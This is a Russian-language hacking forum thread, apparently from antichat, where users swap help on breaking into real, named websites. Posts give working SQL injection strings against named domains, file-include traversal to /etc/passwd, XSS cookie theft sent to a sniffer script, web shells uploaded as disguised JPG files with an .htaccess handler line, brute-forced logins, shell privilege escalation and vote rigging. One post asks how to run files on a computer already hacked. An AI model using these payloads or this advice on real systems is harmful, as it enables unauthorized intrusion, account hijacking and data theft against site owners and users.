Хакнул комп с помошбю последнего сплоита под мастдай. есть cmd.exe подскажите как залить мне файл туда. чтобы потом его выполнить или чтото подобное подскажите что можно с делать в моём случае

через ftp
http://cmdhelp.ru/index.php?cmd=ftp

POST /process.wget_upload.php HTTP/1.0
Host: oneclicktube.com
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Content-Type: application/x-www-form-urlencoded
Content-length: 214
Connection: Close

title=&keywords=Mr%2E&pornstars=111-222-1933email@address.tst&description=111-222-1933email@address.tst&channel=111-222-1933email@address.tst&paysite=111-222-1933email@address.tst&url=dds'&button=Reset&submit=Upload&

Блинд вроде...но и как блинд не хочет раскручиваться(

Как руками определить версию сервера и название сервера.
Я посылаю кривой пакет и иногда в ошибке есть имя и даже иногда версия сервера. Есть ли другие методы определения? И может есть какиенить спец пакеты на которые веб сервер так ругнется что всегда будет название в ошибке? И как определяет хспайдер?

Как руками определить версию сервера и название сервера.
Я посылаю кривой пакет и иногда в ошибке есть имя и даже иногда версия сервера. Есть ли другие методы определения? И может есть какиенить спец пакеты на которые веб сервер так ругнется что всегда будет название в ошибке? И как определяет хспайдер?


[The_HuliGun@server]$ nc edu.mail.ru 80
HEAD / HTTP/1.0

HTTP/1.1 302 Found
Server: nginx/0.6.31
Date: Thu, 30 Jul 2009 14:34:34 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: close
Location: http://edu.mail.ru/cgi-bin/index.cgi

Нето...Нада не прибегая к другим программам

Krist_ALL Что значит "руками" ? Пощупав его что-ли? Попробуй сформулировать вопрос нормально, что тебе нужно


Я посылаю кривой пакет
Нето...Нада не прибегая к другим программам

Ты пакет экспресс почтой что-ли посылаешь?

Не прибегая к сканеру

Krist_ALL
Я тя не понял. Часто, при ошибках сервера вылетает ошибку и внизу версия Апача и т.д... Как вызвать? site.ru/[несущетсвующая дира]... Если не правильно понял, то задай нормально вопрос.

В 404 ошибке не всегда е инфа о сервере. Нада как то еще узнать.Как сканеры определяют?

В HTTP-ответе сервера (заголовки Server, X-Powered-By):
HTTP/1.1 200 OK
Date: Thu, 30 Jul 2009 17:51:04 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16505

Как залить шел на mybb имея админку??? все мозга уничтожил (((

https://forum.antichat.ru/thread27777.html

Доброе утро.
Пробегялся я брутом подному форуму.
И заметил одну вещ, есть
NICK: slot
Pаsswd: 00
Но дело в том , что можно войти и таким поролем 000, т.е. если в пароле одни "нули", то длина пароля не имеет значене. Токое происходит только с нулями.
Это какойто баг?
И возможно ли что нибуть поиметь с этого?

Доброе утро.
Пробегялся я брутом подному форуму.
И заметил одну вещ, есть
NICK: slot
Pаsswd: 00
Но дело в том , что можно войти и таким поролем 000, т.е. если в пароле одни "нули", то длина пароля не имеет значене. Токое происходит только с нулями.
Это какойто баг?
И возможно ли что нибуть поиметь с этого?

что за форум? название, версия.

форум самописный
в личку с кину адрис

форум самописный
в личку с кину адрис
у меня не получилось авторизоваться с теми данными, которые ты кинул.

у меня не получилось авторизоваться с теми данными, которые ты кинул.
ник тот я впример дал, а на самом деле ник uplol.ru
Пароль: 00 или 0000000 разницы нет

ник тот я впример дал, а на самом деле ник uplol.ru
Пароль: 00 или 0000000 разницы нет

потестил, ну вобщем-то ничего ты с этого не поимеешь, просто почему-то криво обрабатываются пароли состоящие из "0", ни с какими другими символами больше не прокатывает.

SeNaP

Скорее всего там пхп?

Примерчик:
<?php
if ( $_GET[pass] == '00' ) echo "В первом случае пароль верный. ";
if ( $_GET[pass] === '00' ) echo "И во втором случае тоже верный!";
?>
Если передать скрипту в параметре 'pass' любое колличество нулей, то пароль в первом if'e всегда будет верный. Во втором - только при двух нулях.

Т.е. в том скрипте некорректно реализована проверка верности пароля. А о разнице между '==' и '===' стоит почитать в док-ии по PHP. (:

https://forum.antichat.ru/thread27777.html
Что ты даешь, там нету способов внедрения шела.

Ответ остается открытым:

Как залить шел на mybb имея админку??? все мозга уничтожил (((

SeNaP

Скорее всего там пхп?

Примерчик:
<?php
if ( $_GET[pass] == '00' ) echo "В первом случае пароль верный. ";
if ( $_GET[pass] === '00' ) echo "И во втором случае тоже верный!";
?>
Если передать скрипту в параметре 'pass' любое колличество нулей, то пароль в первом if'e всегда будет верный. Во втором - только при двух нулях.

Т.е. в том скрипте некорректно реализована проверка верности пароля. А о разнице между '==' и '===' стоит почитать в док-ии по PHP. (:
Да, один ноль не прокатыват, токое ощущение, что просто его скрипт не замечает, просит ввести пароль.

PHP не проверяет равенство типов при двойном равно (==), автоматически приводя их к строковому.
Для верного сравнения данных разных типов применяется тройное равно (===).
Неправильное использование двойного равно, например, в авторизации, == может обернуться уязвимостью.

PHP код:
$aaa = 123456;

if( '123456' == $aaa ){echo '<br>ok!';}else{echo '<br>no.';}
if( '123456' === $aaa ){echo '<br>ok!';}else{echo '<br>no.';}


ok!
no.
(C)Alekt

Что то я вообще запутался

if ($_GET[pass] == 00)
В этом случае $_GET[pass] при водится к строковому типу и сравнивается с 00, которое тоже приводится к строковому типу

'00' равно 00
00 равно 00

if ($_GET[pass] === 00)
В этом случае $_GET[pass] сравнивается с 00 c учётом типов

'00' не равно 00
00 равно 00


Если передать скрипту в параметре 'pass' любое колличество нулей, то пароль в первом if'e всегда будет верный. Во втором - только при двух нулях.
0 - универсальный => использование символов отличных от нуля даёт нормальный результат

Что ты даешь, там нету способов внедрения шела.

например так:

https://forum.antichat.ru/showpost.php?p=565927&postcount=8

и причем здесь обязательно именно админка. Переведи для начала что такое "Remote Code Execution"

http://moikabriz.ru/uslugi.php?uslugi=5Инклюдит файлhttp://moikabriz.ru/uslugi/uslugi5Т.е. в скрипте что-то типа <?php
include('uslugi/uslugi'.$_GET['id']);
?>Соответственно http://moikabriz.ru/uslugi.php?uslugi=/../uslugi5 должен заинклюдить тот же http://moikabriz.ru/uslugi/uslugi5, но нет - пишет нот фаунд.http://moikabriz.ru/uslugi.php?uslugi=/../../index.phpдолжен заинклюдить индекс, но опять нот фаунд.

SeNaP

Вот еще интересный пример:
<?php
if ( '000' == '000000' ) echo "Первое условие верно. ";
if ( '00789' == '000000000789' ) echo "Второе условие верно. ";
if ( "00abc" == "0000abc" ) echo "Третье условие верно";
?>ВыведетПервое условие верно. Второе условие верно.
Т.е. при сравнении оператором '==' строк, состоящих из чисел, предваряемых нулями, нули эти, получается, "отбрасываются". Почему так - я пока не знаю, видимо какая-то фича пхп, постараюсь разобраться в этом.

а на

http://moikabriz.ru/uslugi.php?uslugi=../../../../../../../../../../../../../../etc/passwd

пишет

Operation not permitted

мод секурити или типа того... Бесполезно...

http://moikabriz.ru/uslugi.php?uslugi=/../uslugi5 должен заинклюдить тот же http://moikabriz.ru/uslugi/uslugi5, но нет - пишет нот фаунд.http://moikabriz.ru/uslugi.php?uslugi=/../../index.phpдолжен заинклюдить индекс, но опять нот фаунд.
*зачеркнуто*
Для начала определись что есть папка, и что есть файл.
Ты пытаешься подняться выше несуществующего файла
*/зачеркнуто*
соре ошибочка.
Ты пытаешься подняться выше несуществующего пути. вот.

Т.е. при сравнении оператором '==' строк, состоящих из чисел, предваряемых нулями, нули эти, получается, "отбрасываются". Почему так - я пока не знаю, видимо какая-то фича пхп, постараюсь разобраться в этом.
Строки, при таком сравнении, приводятся интерпритатором к числам, если в них вначале есть числа. Остальное отбрасывается. Посмотри вот так:
if ( 4 == '4abc' ) echo "условие верно. ";

Тоесть по сути ты сравниваешь
1. 0 с 0
2. 789 и 789
3. Нет чисел, тоесть 2 разных строки

Ну а "0" это не совсем число, при таком сравнении. Это у пыха "особенный символ" :)
if ( 0 == null ) echo "условие верно. ";
if ( 4 == '0004abc' ) echo "условие верно. ";

jokester

Интерпретатор переводит строку к числу, когда у нее первый символ - цифра, если второй операнд - числовой (как в твоем примере). Но я в тех примерах сравнивал по две строки, а не числа со строками.
К тому же, если интерпретатор просто переводит эти строки в числа, то с нулем в начале, он по логике вещей скорее должен был бы считать их восьмеричными числами, но это не так: 0789 - не восьмеричное число.

По сути, скорее всего пхп сравнивает:
'' c '' (пустые строки)
'789' и '789' (именно строки, а не числа)
и строки '00abc' и '0000abc' - при наличии букв нули в строках не убираются, даже если вставить цифры:
<?php
if ( '0012a' == '000012a' ) echo "Условие верно";
?>Результатом условия будет false.

add: впрочем, это пока просто мои предоложения - как будет время покопаюсь в сорсах php по этому поводу.

cr0w

Он так-же приведёт строки к числу если обе строки состоят только из цифр.

add/

Так что вроде всё логично. Это строки, т.к. буквы присутствуют:
if ( '0012a' == '000012a' ) echo "Условие верно";

А вот это уже числа:
if ( 4 == '4abc' ) // сдесь т.к. один из операндов число
if ( '000' == '000000' ) // ну а тут
if ( '00789' == '000000000789' ) // всё числа

PS Спасибо Qwazar, направил на путь истиный :)

раз удалил тему мою кто то напишу тут

есть XSS спер куки...тока спер я PHPSESSID а с логином и пассом куки не сперлось

что это мне дает? можно ли что нибудь с этим сделать?

jokester

В целом, ты тут прав.

Хотя насчет "логичности" таких преобразований типов можно было бы поспорить. Но в документации такое поведение, вобщем-то, кое-как зафиксировано, т.ч. ресерчить тут вроде как и нечего.

cr0w, да логично, логично.

Если один из операндов однозначно число, то оба операнда приводятся к числам, и сравниваются как числа.

Если оба записаны в виде строк, то проверяется числа это или строки, если числа, то сравниваются как числа, если хотябы один операнд однозначно не число, то сравниваются как строки, посимвольно.

Логично :)

Qwazar

Нелогично в том плане, что числа в пхп могут быть не только десятичными. И тут возникает "неоднозначность", когда в строке находится число, начинающееся с нуля. Почему пхп приводит его к десятичному числу, отбросив нули, а не к восьмеричному (кстати, это не только в пхп так, но и в perl, например) ? (;

раз удалил тему мою кто то напишу тут

есть XSS спер куки...тока спер я PHPSESSID а с логином и пассом куки не сперлось

что это мне дает? можно ли что нибудь с этим сделать?
Можно попробовать вставить в браузер, будешь авторизован на сайте автоматом, единственный минус идентификаторы долго не живут.

как и любые остальные куки - время жизни есть у всего. Вы вообще, хоть раз в жизни, смотрели свои куки на форумах всяческих? Что, везде прямо таки md5 и лежит? Давно уже пора привыкнуть, что если хотя бы сессия есть - уже круто. Про пароли забудьте раз и навсегда на бол-мен нормальных ресурсах

как и любые остальные куки - время жизни есть у всего. Вы вообще, хоть раз в жизни, смотрели свои куки на форумах всяческих? Что, везде прямо таки md5 и лежит? Давно уже пора привыкнуть, что если хотя бы сессия есть - уже круто. Про пароли забудьте раз и навсегда на бол-мен нормальных ресурсах

ну вот а как мне ее реализовать то? =)

ай нид хелп. Не могу найти админку http://www.mgounb.ru

Bramin, http://madnet.name/tools/madss/ ответит на твой вопрос.

*добавляй в закладки браузера, полезно будет.

Qwazar

Нелогично в том плане, что числа в пхп могут быть не только десятичными. И тут возникает "неоднозначность", когда в строке находится число, начинающееся с нуля. Почему пхп приводит его к десятичному числу, отбросив нули, а не к восьмеричному (кстати, это не только в пхп так, но и в perl, например) ? (; Ты использовал только цифры 0-7 ? С плавающими числами всех видов норм приводит к числу. С восьмеричными не пробовал.

ну вот а как мне ее реализовать то? =)


в опере вставляй вместо своих и F5

Ты использовал только цифры 0-7 ? С плавающими числами всех видов норм приводит к числу. С восьмеричными не пробовал.
Например:
<?php
if ( 12 == '12' ) echo "Условие 1 верно. ";
if ( 012 == '012' ) echo "Условие 2 верно. ";
if ( 0x1A == '0x1A' ) echo "Условие 3 верно.";
?>
выведетУсловие 1 верно. Условие 3 верно.Шестнадцатеричные числа - нормально преобразуются из строки в число, восмеричные - нет. Собственно, в этом и вижу некоторую "нелогичность" такого поведения интерпретатора.

Пытаюсь провести инъекцию в Access (в форме авторизации).

Ввожу
логин p' or 1=1/* и пароль произвольный, но мне выдает

Microsoft JET Database Engine error '80040e14'

Syntax error (missing operator) in query expression 'usr='p' or 1=1/*''.

/admin/script.asp, line 25

Что не так?

Вроде в MSSQL вместо /* нужно писать -- или #

В Access используй нулл байт чтобы отбросить ненужную часть запроса

Есть иньекция

15+union+select+1,2,3,column_name,5,6,7+from+infor mation_schema.columns+where+table_name='menu'--

Но почему-то ничего не виводится... Пробовал на нескольких сайтах. Может запрос неправильный?

спасибо, помог)

']В Access используй нулл байт чтобы отбросить ненужную часть запроса


C нульбайтом также..

Скорее всего данные отправляются постом, поэтому проверь, что отправляется %00, а не %2500. Отправляй данные напрямую или используя плагины для FF типа TamperData.

http://www.washingtoninstitute.org/

Помогите админку найти.. искал IntelliTamper, не помогло(

Пасс и логин в базе есть.

']Скорее всего данные отправляются постом, поэтому проверь, что отправляется %00, а не %2500. Отправляй данные напрямую или используя плагины для FF типа TamperData.

Да слал скриптом на php через сокеты - и \x00 и %00 - ощибка та же.

Вот решил обратиться за советом :)
Вот такой код

$id=((int)abs($_GET['id']));
$sql=mysql_query('SELECT * FROM `site` where `id`=\''.$id.'\' LIMIT 1;'))>=1)

Полность не уязвим от SQL inj?

да

зачем фильтрация? какая фильтрацция..? (int) - твоя фильтрация...


http://forum.antichat.ru/thread30641.html

игрался с консолью мускула)
может и было где то но я узнал что при иньекции в инсерте можно сделать блинд и выполнять запросы))хочу проверить прав или нет?)
имеем таблица users
mysql> select * from users;
+-------+-------------------+
| U_ID | U_PASSWORD |
+-------+-------------------+
| admin | thankyou444 |
+-------+-------------------+

теперь представим регистрацию на сайте) естественно будет больше колонок но не суть важно)
смысл: INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ($_GET['id'],$_GET['pass']);
допустим

mysql> INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('1','2');
Query OK, 1 row affected (0.00 sec)

как и должно быть :)
мы же можем изменять параметры id и pass
mysql> INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('1',if(1=1,1,(select 1 union select 2)));
Query OK, 1 row affected (0.02 sec)

mysql> INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('1',if(1=2,1,(select 1 unio
n select 2)));
ERROR 1242 (21000): Subquery returns more than 1 row

mysql> INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('1',if(substring(version(),
1,1)=4,1,(select 1 union select 2)));
ERROR 1242 (21000): Subquery returns more than 1 row

mysql> INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('1',if(substring(version(),
1,1)=5,1,(select 1 union select 2)));
Query OK, 1 row affected (0.00 sec)

но как я понимаю должно быть так INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('$_POST['id']','$_POST['pass']');
тогда получится так
mysql> INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('1','if(substring(version()
,1,1)=5,1,(select 1 union select 2))');
и mysql> select * from users;
+-------+------------------------------------------------------------+
| U_ID | U_PASSWORD |
+-------+------------------------------------------------------------+
| joker | thankyou444 |
| 1 | if(substring(version(),1,1)=5,1,(select 1 union select 2)) |
+-------+------------------------------------------------------------
выход (наверна):
$_GET['id']=1',if(1=1,1,2)/* получится запрос
INSERT INTO `users` (U_ID,U_PASSWORD) VALUES ('1',if(1=1,1,2)/*','')
и он выполнится)
естественно все прокатит при определенных фазах луны, выключенных магик_квотес и т.д.)
прав я или нет?)

Да ты ЕвГЕНИЙ!!! :D
https://forum.antichat.ru/threadnav35207-1-10.html

Инфа от 11.03.2007

2jokester
знаю я эту статью)
но там нет объединиения insert и "Subquery returns more than 1 row" :)
упомянув о срыве запроса ошибкой он не сказал что можно это провести и с другими запросами. не только селект как написано в статье)

думаю это дополнение ))))

и еще вопрос)
mysql> update `users` set U_ID='l' where U_ID=if(1=1,'iii',(select 1 union sele
t 2));
Query OK, 0 rows affected (0.09 sec)
Rows matched: 0 Changed: 0 Warnings: 0

mysql> update `users` set U_ID='l' where U_ID=if(1=2,'iii',(select 1 union sele
t 2));
Query OK, 0 rows affected, 1 warning (0.03 sec)
Rows matched: 0 Changed: 0 Warnings: 0

в последнем запросе говорит про варнинг но не ерор)
неужели нельзя провести провокацию на ошибку?)

j0ker13

Специально для тебя:

п 2 (большие жирные зелёные буковки):
[2] INSERT и другие
п 4 (те-же самые буковки)
[4] Альтернатива benchmark'y

И вот тут уже твои примеры, только в качестве оператора, для примера взят select. Но это без разницы, оператор любой может быть, в том числе и update

упомянув о срыве запроса ошибкой он не сказал что можно это провести и с другими запросами. не только селект как написано в статье)
Разумеется, вместо INSERT может стоять любой другой оператор, в том числе и SELECT, ведь с ним тоже бывают cложные случаи инъекций.
Просто прочти её :)

:) ладна не будем засорять топ) удали сообщения)
пусть читают нормальные статьи))

Хотелось бы заметить, что при update нельзя читать этуже таблицу, другую можно. Например:insert into users values(1,(select ...From users)) будет ошибка. Но это так,замечание.

Возможно ли как нибудь с помощью xss угонять сессию не из кеша, а из GET, т.е. из адрисной строки?

Вообще-то сессии с помощью XSS угоняются из cookie, если в куках есть сессия - можно угнать, если найти xss

Что за SID и кеш? Если SID, это SesionID, то да.
Както так:
document.write('<html><body><script src=sniffer/img.gif?"+document.location></script></body></html>');
Ты знаеш что такое GET запрос?

Вообще-то сессии с помощью XSS угоняются из cookie, если в куках есть сессия - можно угнать, если найти xss

Даже если прекрипить скнифер в место картинки всеровно не получится?

Ну как ты написал это адресная строка.
В твоём примере совсем другое...

Гет запрос это переменные которые видна в адресной строке. Если ид сессии передается через гет, следовательно сессионид видно в браузере в адресной строке, следовательна надо передать сндферу адресную строку. Снифер.Пхп? +документ.Локатион. По другому нельзя!

Pavlov, бредовый твой код.
SeNaP, если сессия в урле, записывай рефферер.

Если сессия есть в адресной строке, где есть XSS (если пассивка), то там всегда будет сессия того, кто даёт такую ссылку:))) Т.е. таким вычурным методом вы сопрете свою собственную сессию. Так что только +document.cookie было и остается актуальным:)

Ну и совсем другое дело, если активная XSS, тогда достаточно будет перенаправить на свой PHP-снифер и взять рефа, без всяких +document.cookie, но смысла в таком занятии особого нет, т.к. в куках может быть что-то поинтересней чем просто сессиия, например id и прочие параметры, так что опять к нашим баранам: +document.cookie, как неизбежность

mailbrush, точнооо, спасибо :)

Если сессия есть в адресной строке, где есть XSS (если пассивка), то там всегда будет сессия того, кто даёт такую ссылку:))) Т.е. таким вычурным методом вы сопрете свою собственную сессию. Так что только +document.cookie было и остается актуальным:)
Ты наверное не правельно понял, может я чтото не догоняю.
Уменя вданном случии, можно перкрепить снифер вместо автарки в профеле, когда юзер будет смотреть профиль, то у него должно передатся на снивер всё что у него в адрисной строке.
Т.е. можно за юзать http_referer, адальше записыать в логи :cool:

Ты не догоняешь, это - активная XSS, читай мой пост выше про активки, какой смысл тырить только рефа, если можно стырить все куки. Реф и так тырица в нормальных снифах по умолчанию

Ты не догоняешь, это - активная XSS, читай мой пост выше про активки, какой смысл тырить только рефа, если можно стырить все куки. Реф и так тырица в нормальных снифах по умолчанию
Но вот только форум тот где XSS, кроме бана и антифлуда в кеш больше не что не записывает

Тогда да, будет достаточно рефа схватить, тогда вопрос не понятен вообще к чему - еще раз - в любом нормальном снифаке реф тырица и так по умолчанию, например в снифере от того же каника.

Просто ставишь перенаправление на свой снифак и всё, только не забудь потом чувака обратно вернуть:)

ЗЫЖ И не называй куки кэшом, это разные вещи

Значит у меня к вам следующий вопрос ©

Нашёл SQL на нужном мне сайте в POST запросе.
Воткнув обычную ковычку выскочило:
{"error":"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\'' at line 1"}
Во первых почему то запрос взялся в фигурные скобки...

Дальше попробовал подобрать количество столбцов:
add=-1'+UNION+SELECT+1/*
и так
add=-1+UNION+SELECT+1/*
и так
add=-1'+UNION+SELECT+1--
и так
add=-1'+UNION+SELECT+1#
Ошибка SQL оставалась всё та-же, то есть нигде не было уведомления про несовпадения столбцов, как бы я не пытался...

Далее подставив вместо запроса:
add=lol
Я получаю:
{"error":"Unknown column 'ass' in 'where clause'"}
В общем у кого есть какие идеи по объеденению столбцов, то напишите как правильно в моём случае их сделать...
Может тут что фильтруется?

... near '\\'' at ...
Вроде это сведетельствует о том, что magic_quotes_gpc используется вместе с addslashes, т.к. после экранирования кавычки мэджиками, идет экранирование слеша (я могу ошибаться)...
Далее подставив вместо запроса:
add=lol
Я получаю:
{"error":"Unknown column 'ass' in 'where clause'"}
Подставь другой текст, ass так же?

Во первых почему то запрос взялся в фигурные скобки...
Ну мб вывод ошибки типа
...
echo '{"error":"'.mysql_error().'"}';
...

А может это не селект а update запрос?
Судя по названия переменной адд
А может инсерт вовсе...

Подставь другой текст, ass так же?

Тут я ошибся, в переменной add= содержится цифровой номер колонки, какое бы значение не подставить, такое и отобразится на экране.
Вот только не знаю влияет ли это на SQL или нет.

А по поводу magic_quotes_gpc используется вместе с addslashes, что тут можно предпринять, или дохлый номер?

Судя по всему запрос и есть Update потому как он POST`om отправляет заказ на сайт

ну если он UPDATE то union select не прокатит!
с помощью юнион можно только объединить два SELECT запроса.

по идеи там запрос типа
UPDATE blabla SET bla_par={$_POST['add']} bla..... WHERE bla......
Поюзать ты сможешь если: сможешь потом получится посмотреть то что проапдейтил!

Не плохо было б знать какие еще это запрос изменяет поля.А вообще подзапросы в помощь.

пример

UPDATE blabla SET bla_par=(SELECT version()) WHERE tratata....-- bla..... WHERE bla......
или ты к примеру знаешь что этот же запрос апдейтит текстовое поле name
UPDATE blabla SET bla_par=1, name=(SELECT concat_ws(0x3a,version(),database(),user()) WHERE tratata -- bla..... WHERE bla......
лучше конечно взглянуть бы в сорцы если это возможно что б иметь представление о структуре запроса

извените если сказал бред (=

АПД: или юзай more than 1 rows https://forum.antichat.ru/threadnav35207-1-10.html
АПД2:
UPDATE table SET add=(SELECT ASCII( substring( (SELECT login FROM users WHERE id=1 ),3,1) )) WHERE id=1

вот пример запроса с инъекцией(жирным наш код)
перебираем по одному символы. Это конечно если можно глянуть результат апдейта.

ну если он UPDATE то union select не прокатит!
с помощью юнион можно только объединить два SELECT запроса.

по идеи там запрос типа
UPDATE blabla SET bla_par={$_POST['add']} bla..... WHERE bla......
Поюзать ты сможешь если: сможешь потом получится посмотреть то что проапдейтил!

Не плохо было б знать какие еще это запрос изменяет поля.А вообще подзапросы в помощь.

пример

UPDATE blabla SET bla_par=(SELECT version()) WHERE tratata....-- bla..... WHERE bla......
или ты к примеру знаешь что этот же запрос апдейтит текстовое поле name
UPDATE blabla SET bla_par=1, name=(SELECT concat_ws(0x3a,version(),database(),user()) WHERE tratata -- bla..... WHERE bla......
лучше конечно взглянуть бы в сорцы если это возможно что б иметь представление о структуре запроса

извените если сказал бред (=

АПД: или юзай more than 1 rows https://forum.antichat.ru/threadnav35207-1-10.html
АПД2:
UPDATE table SET add=(SELECT ASCII( substring( (SELECT login FROM users WHERE id=1 ),3,1) )) WHERE id=1

вот пример запроса с инъекцией(жирным наш код)
перебираем по одному символы. Это конечно если можно глянуть результат апдейта.
и часто ты такое видел?..чтобы знач не в кавычках шло?..не считая int..?

add= содержится цифровой номер колонки
судя по этому инт!

довольно часто бывает без ковычек

Имею доступ к админке. Двиг самописный. Могу редактировать новости. даже html не вставляет типа
<script>alert(//);</script>
Есть ли возможность вставить шелл\php код?
Вообще если даже html отбрасывает, то наверно нет.
В бд есть таблица с новостями, там то точно фильтра нету, сделай прям в таблице PHP скрипт.
Ну а вообще некто не отменял проверять :)

<?PHP
echo "Proverka antichat";
?>

Потом заходишь в новость, CTRL+F, Proverka antichat.
Если найдено -> include('твой шелл');
Если ненайдено -> облом, ищи другую дыру.

тогда вставляй туда уже любой свой хтмл/жаваскрипт код только шеллом это тебе не светит...

т.е. как?)
зы: <?php echo "test"; ?> не пашет, прямо так и выводит ((
В таблице - в базе данных.
Просто перед заносом данных в таблицу новостей.
Идёт фильтр написанный на PHP.
А так если вручную вписать то выполниться.

В вышеприведенном скрипте - нет.
HTML не имеет доступа к файловой системе.

Фильтрует именно ">? Или " и > по очереди?

Узнал таблицу,поля,столбцы.
По запросу

Выдаёт ошибку.
Что не так?
Так же пробовал
Limit, потом может быть addslashes.
union+здесь кол-во полей и т.п. +concat_ws(0x3b,user_name,password,email)+from+adm in_user+limit+1,1+--+

не думал что она просто закрыта?

не думал что она просто закрыта?
На ключ?

DeluxeS
https://forum.antichat.ru/thread104591.html
Вопрос №3

site.com/request_list.asp?action=view&id=111814+and+1=(select+@@version
но при

site.com/request_list.asp?action=view&id=111814+or+1=(select+top+1+table_name+from+infor mation_schema.tables)--
ругается а-ля

Incorrect syntax near the keyword 'from'.


при union select верном пишет Incorrect syntax near '@@version'.


перегуглил все интернеты, нигде не нашел вразумительного ответа, обходы /**/, %20 и прочее не пашет, подскажите а?

Ты для union select кол-во колонок подбирал?

site.com/request_list.asp?action=view&id=111814+and+1=(select+@@version
но при

site.com/request_list.asp?action=view&id=111814+or+1=(select+top+1+table_name+from+infor mation_schema.tables)--
ругается а-ля

Incorrect syntax near the keyword 'from'.


при union select верном пишет Incorrect syntax near '@@version'.


перегуглил все интернеты, нигде не нашел вразумительного ответа, обходы /**/, %20 и прочее не пашет, подскажите а?
1' or 1=@@version
или
1 or 1=@@version

http://injection.rulezz.ru/MSSQL-Injection.html
На почитай.

Добрый день!У меня вопрос по голосованию на этом сайте http://www.pervouralsk.ru/partyzanky/
Голосание проходит,один логин один голос.Но у некоторых уже почти 1000,как это можно реализовать????я регистрировал сам акки,но это очень долго и муторно.ПОдскажи как можно???если возможно то накрутите за Салацкую Марию!

есть шелл на сайте, в конфигах нашол пасс от sql рута.
Как через sql рута поднять права на шелле?

SQL Root - Это SQL Root, но не линуксовый.
С его помощью права на серваке не поднимешь (только в SQL).

есть шелл на сайте, в конфигах нашол пасс от sql рута.
Как через sql рута поднять права на шелле?
Пробуй пасс к ssh, ftp, etc. вдруг повезет ))

Где можно взять исходники PHP ?
Т.е. серверной части.
ps
НЕ СКРИПТЫ И НЕ ДВИЖКИ.
А бинарки или как там это.

http://www.php.net/downloads.php

Зачем клеить? Может просто код в картинку записать? Если да, то через WinHex затирай последние байты FF D9 и пиши код. Потом эти байты в конце допишешь.

AddType application/x-httpd-php .jpg - добавить в .htaccess на сервере.

и будет исполнение jpg как php файла

DeluxeS, подробнее.
Ты шелл хочешь залить? через какую систему?

короче если ты хочеш залить шелл через картинку то тебе нужно залить еще один файл - .htaccess, если ты его не можеш залить тогда у тебя шелл в картинке не будет исполнятся

да. самописная вроде.
Админка:
1)поддерживаются картинки .jpg & .jpeg
2)возможно редактирование новостей - пока осматриваюсь.
2 варианта
upd: Можно вставить строчку пхп кода.. include() ?
Если есть возможность подлить картинку и тем более потом ее проинклюдить ни вижу проблемы, выполнить php код можно в инклюде - если включены соответствующие враперы под это дело - php:// и т.д. - но легче уже удаленные файл проинклюдить если опять таки allow_url_include <=5 или allow_url_fopen >5.

да. самописная вроде.
Админка:
1)поддерживаются картинки .jpg & .jpeg
2)возможно редактирование новостей - пока осматриваюсь.
2 варианта
upd: Можно вставить строчку пхп кода.. include() ?
shell.jpg.php

DeluxeS
[x] Пробуй пароль от админки к ftp/ssh.
[x] Ищи уязвимости на соседних сайтах (ReverseIP), если найдешь LFI, то сможешь проинклюдить и картинку.
[x] Не любую фильтрацию можно обойти, но пробуй по-разному: file.php3.jpg, file.php.jpg.phtml и т.д... Попробуй с %00 поиграться.

Не выходит ;( А постом выше не понял ((
ну а что тут понимать, судя по вашему посту у вас есть возможность ИЗМЕНИТЬ ЗНАЧЕНИЯ КОТОРОЕ ПОДСТАВЛЯТЬСЯ В include(а именно это как я понял есть судя по "upd: Можно вставить строчку пхп кода.. include() ?") и есть возможность загрузить картинку(и это судя по всему есть судя по "поддерживаются картинки .jpg & .jpeg "), вызываем где нибудь error - смотрим путь(ну или пользуемься относительными путями если в инклюде что присутствует e.g. - ../../image.jpeg), далее загружаем картинку и при условии что она сохраняется в ФС инклюдим ее.
Если загружаемую картинку проверяют тупа по mime-type отсылаемому браузером и расширения без проверки самого содержимого - просто переименовываем шелл в картинку - был shell.php стал shell.jpeg, если же с картинкой проводятся какие то операции(определяеться размер например) и если выполнения этих операций зависит будет ли картинка скопирована - открываем в NOTEPAD++ картинку поменьше размером и без <? <?php ?> в содежимом - вставляем в конце php код какой нам надо(не обязательно тупа шелл - можно какой то аплоудер), не факт что картинка не побьеться, далее загружаем картинку и инклюдим, все это описывалось такое количество раз что я просто не пойму что вам не понятно :).

Есть слепая скуля без выводимых полейhttp://mirsauni.ru/?cid=4+OR+id=IF(ascii(substring((select+TABLE_NAME +from+INFORMATION_SCHEMA.TABLES+LIMIT+17,1),1,1))>0,889999999999,BENCHMARK(9999999,MD5(NOW())))--

Все ок,работает.Не понятно только почему cid=4+OR+id=IF (нашел опытным путем) ,а не cid=4+OR+сid=IF (так не работет). Ну да ладно...

Хотелось бы избавится от BENCHMARK'a, т. к. с ним выуживать таблы я 100 лет буду.Вар-ты типа
IF(ASCII(SUBSTRING((SELECT VERSION()),1,1) =5,'1','0')
find_in_set(substring((SELECT VERSION()),1,1),'0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f')

не катят, думаю что из-за кавычек в запросах. Кодирую кавычку в HEX - все равно 0 рез-тат.

Задача осложяется тем, что к примеру на 2 идентичные запроса ?cid=4 из БД будет вытащена разная инфа (какой-нить RANDOM() стоит).

Кто хочет поковырять, велком 10115695. У меня уже мозг кипит.

http://mirsauni.ru/?cid=4 OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100,1,(SELECT 1 UNION SELECT 2))--
http://mirsauni.ru/?cid=4 OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=1000,1,(SELECT 1 UNION SELECT 2))--
Например Скрипт (http://forum.antichat.ru/showpost.php?p=894169&postcount=5) Грея умеет работать с море ван роу..(Хотя если правильно настроить сгодитцо и bsqlbf, и т.д)

DeepXhadow, юзай сипт :)

Посмотри вот эти темы:

https://forum.antichat.ru/thread119047.html
https://forum.antichat.ru/thread35207.html

